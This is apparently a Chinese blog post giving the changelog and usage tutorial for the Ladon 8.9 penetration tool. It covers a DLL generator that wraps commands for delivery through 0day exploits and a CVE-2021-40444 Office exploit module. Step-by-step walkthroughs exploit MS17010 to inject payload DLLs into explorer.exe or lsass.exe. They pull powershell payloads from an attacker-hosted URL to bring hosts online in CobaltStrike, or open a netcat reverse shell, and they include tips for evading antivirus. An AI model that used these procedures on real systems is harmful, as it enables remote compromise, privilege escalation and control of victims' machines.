Ladon8.9更新功能

20210920
[+]CmdDll Windows 0day漏洞通用DLL注入生成器,生成的DLL仅5KB,非常适合0day加载

2021.9.15
[u]webscan CS保留
[u]CmdDll 去除黑框

2021.9.14
[+]CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞,Office文档利用模块
影响版本: 包括Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
[+]CmdDll cmd转DLL(Win系统0day漏洞DLL执行命令payload,可直接powershell上线CobaltStrike)
溢出漏洞如MS17010、本地提权CVE-2021-1675等,非溢出如最新的Office漏洞CVE-2021-40444等

CMD用法

Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

PS:由于生成的DLL仅5KB,所以可执行的payload的最大长度是2000字节,基本上够用了,可执行NC反弹,CS上线,或各类powershell框架远程加载执行。

DLL测试

Usage:
Rundll32 sc32.dll,k8
Rundll32 sc64.dll,k8

复现0day前,测试是必须的,先保证DLL功能正常,才能拿去复现漏洞,不然你不知道是漏洞的DLL注入或DLL加载器没调好,还是DLL本身有问题,DLL启动参数是任意的,意味着不管漏洞注入导出函数是什么,都能加载,所以我们可用于多个已知漏洞或以后新出的0day漏洞测试。

GUI用法

由于生成DLL都是本地生成,使用CMD版比较麻烦,所以该功能添加到GUI中。用法打开LadonGUI–CmdDll模块,上文本框填写需要执行的CMD命令,CMD执行有两种方式,一是默认的CMD执行,二是PowerShell Base64加密执行,(勾选Base64Cmd),根据需要点击对应系统位数生成DLL。

弹计算器演示

为了方便,可以通过GUI上的TEST按钮测试DLL功能

MS17010漏洞CS上线演示

1 通过命令 Ladon 192.168.1.8/24 MS17010 扫描发现192.168.1.106主机存在MS17010漏洞
2 配置好CS监听器,使用“Web Delivery”生成powershell的URL监听
3 LadonGUI-CmdDLL-CS文本框填写URL,如http://192.168.1.108/a,生成x86的DLL(目标32位系统)
4 使用命令 Ksmb.exe 192.168.1.106 445 sc32.dll explorer.exe,远程溢出106主机并将dll注入explorer.exe,注入explorer进程得到的是当前用户权限,如果注入lsass.exe得到的是system权限,其它进程也是同理,看进程启动所使用的权限,实际测试请根据需要,如遇到不出网的情况,需添加用户注入explorer可能就会失败,因为有些机器开启UAC。

MS17010漏洞NC反弹演示

可能有些机器存在杀软查杀CS,导致无法直接上线CS,这时我们可使用NC或MSF上线

1 通过命令 Ladon 192.168.1.8/24 MS17010 扫描发现192.168.1.106主机存在MS17010漏洞
2 打开LadonGui-NetCat-启动监听,默认监听本机4444端口,使用 Ladon web 800 启动WEB,在GUI里填写对应PS1的下载地址,如http://192.168.1.108:800/Ladon.ps1,实战若是需要远程内存加载其它powershell框架,下载exe、dll等文件均可使用Ladon的web模块监听
3 LadonGUI-CmdDLL-填写IP和端口,生成NC x86的DLL(目标32位系统)
4 使用命令 Ksmb.exe 192.168.1.106 445 sc32.dll explorer.exe,远程溢出106主机,成功反弹shell

#### CVE-2021-40444 Office漏洞复现CS上线

http://k8gege.org/Ladon/CVE-2021-40444.html

Ladon下载

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.9版本:K8小密圈

〖教程〗Ladon 0day通用执行命令DLL生成器-MS17010演示相关推荐

  1. 紧急:Spring框架被爆出存在0day级别远程命令执行漏洞。漏洞危害程度不亚于log4j漏洞根据目前掌握的信息,JDK版本在9及以上的Spring框架均受影响。该漏洞目前无官方修复补丁

    Spring框架被爆出存在0day级别远程命令执行漏洞.漏洞危害程度不亚于log4j漏洞根据目前掌握的信息,JDK版本在9及以上的Spring框架均受影响. 漏洞信息和漏洞影响排查方法如下: 漏洞名称 ...

  2. python3.6卸载教程_Python3.6安装卸载、执行命令、执行py文件的方法详解

    开发一个功能,C/C++可能要500行代码,Java可能需要200行代码,然而Python可能需要50行代码,虽然代码少,可能开发的飞起,但是这其实是已牺牲运行效率位代价的,可能C只要1秒,Java需 ...

  3. css+javascript网页抖动图标、抖动制作教程,输入抖动命令js执行命令让网页抖动起来(详细版)

    首先我想说关于网页中做css抖动不难,用js命令也不难,下面我将为大家详细介绍具体做法. 一.我们要先有个网页代码的基本架构,比如 <!doctype html> <html lan ...

  4. Windows中通过bat定时执行命令和mysqldump实现数据库备份

    场景 Windows Server 的服务器,使用的数据库是Mysql数据库. 需要定时对数据库进行备份. 怎样通过一个bat脚本双击运行后定时执行命令. 通过Mysql自带的mysqldump实现将 ...

  5. MySQL利用UDF执行命令

    UDF即User-Defined Functions lib_mysqludf_sys 在github的介绍: A UDF library with functions to interact wit ...

  6. 命令执行——命令执行漏洞概述(一)

    普及内容 了解命令执行定义 了解命令执行条件 掌握命令执行成因 了解命令执行危害 掌握命令执行实例 掌握管道符号和通用命令符 了解命令执行常见场景 基础概念 命令执行定义 基本定义 命令执行漏洞是指攻 ...

  7. 绕过宝塔禁止的php函数,宝塔disable functions函数全被禁命令执行+加域服务器如何无限制执行命令...

    本地搭建实验环境时遇到了不少小问题 实验环境2008 R2 宝塔搭建的IIS discuz3.2X 手动上传shell 冰蝎连接 (ps:有表哥使用冰蝎的时候提示文件存在但是无法获取密钥,解决办法,使 ...

  8. Hadoop教程(三)HDFS文件系统Shell命令

    Hadoop教程(三)HDFS文件系统Shell命令 本文链接:https://blog.csdn.net/yuan_xw/article/details/50202381 Hadoop教程(三)HD ...

  9. 服务器如何启动运行,如何在服务器系统启动或重新启动时执行命令或脚本

    作为一个Linux系统的管理员,甚至是一个普通的Linux用户,你可能需要定期或在需要的时候运行一些命令或脚本.我们使用crontab来完成这些任务,我们在教程中已经讨论过Crontab.但是,我们如 ...

  10. 【linux】ssh 远程执行命令

    1.概述 转载并且补充:ssh 远程执行命令 SSH 是 Linux 下进行远程连接的基本工具,但是如果仅仅用它来登录那可是太浪费啦!SSH 命令可是完成远程操作的神器啊,借助它我们可以把很多的远程操 ...

最新文章

  1. Windows系统下nodejs、npm、express的下载和安装教程详解
  2. 树莓派编译一个C程序
  3. linux递归创建文件夹_Python中并发请求创建文件夹带来的线程安全问题
  4. 金叉成功率_技巧!三分钟教会你识别macd真假金叉,让你精准把握买卖点!
  5. Web 安全开发规范手册 V1.0
  6. boost::split()的使用方式
  7. 2021曾都二中高考成绩查询入口,2021高考-随州设4个考区11个考点·
  8. 有机晶体数据库_面向Journal of Organic Chemistry作者的晶体学信息文件(CIF)工作流程将于10月6日作出调整...
  9. 2021最新一线互联网大厂常见高并发面试题解析
  10. 初中计算机卡片的制作教案,【我的拼音卡片教案】制作拼音卡片
  11. EXCEL之画带数据点的折线图只有点没有线
  12. 如何设置QQ空间免费背景音乐
  13. 基于XC7K325T数据处理PXIE载板、FMC载板
  14. 智能车浅谈——硬件篇
  15. 丹纳赫完成对PNI和GoSilico的收购;拜耳收购Noria 和PSMA Therapeutics | 医药健闻
  16. bootload启动流程(三)--Eboot每个函数的详细说明
  17. 小技巧使Windows Live Writer网络图片本地化
  18. 【Win10 UWP】QQ SDK(一):SDK基本使用方法
  19. 楚留香服务器最多人,楚留香:你可能没想到,你所在服务器的背后还有这样的故事!...
  20. 线性判别分析的思考与笔记

热门文章

  1. Oracle学习网站总结
  2. UE源码版本下载编译全流程
  3. 推荐Linux音乐播放器:咪咕音乐
  4. 课程设计---宾馆客房管理系统
  5. java会议室预约系统源码_基于jsp的会议室预订预约-JavaEE实现会议室预订预约 - java项目源码...
  6. 网络工程师/技术支持工程师面试题(1)
  7. 大华中心管理服务器,大华监控中心联网解决方案
  8. 软件工程-软件测试和系统运维
  9. Java Map是否有序?
  10. okhttp返回内容乱码_tomcat服务器接口返回的数据乱码